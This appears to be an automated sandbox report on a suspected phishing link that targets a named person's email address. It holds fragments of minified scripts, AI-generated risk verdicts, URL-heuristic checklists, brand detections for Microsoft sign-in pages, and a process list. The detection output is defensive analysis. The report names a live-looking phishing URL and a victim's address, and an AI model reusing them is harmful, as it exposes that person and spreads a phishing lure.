"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@beantech.it Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script primarily involves DOM manipulation and utility functions typical of jQuery, with no malicious intent. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://irishjewel.ie Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://irishjewel.ie |
| URL: https://aadcdn.msauth.net/shared/1.0/content/js/Bs... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The code is also accompanied by a third-party notice, indicating it is likely part of a larger, well-documented project. While the script uses some legacy practices like `XDomainRequest`, these pose only minor risks and are not inherently malicious. Overall, the snippet seems to be a benign implementation of a standard web API, with no clear signs of malicious intent."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var |
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@beantech.it Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@beantech.it Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://login.microsoftonline.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.microsoftonline.com |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We couldn't find an account with that username. Try another, or get a new Microsoft account.",
"prominent_button_name": "Next",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://microsoftonline.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://microsoftonline.com |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
rundll32.exe (PID: 5576 cmdline: 
OUTLOOK.EXE (PID: 3932 cmdline: 
ai.exe (PID: 5568 cmdline: 
chrome.exe (PID: 6404 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node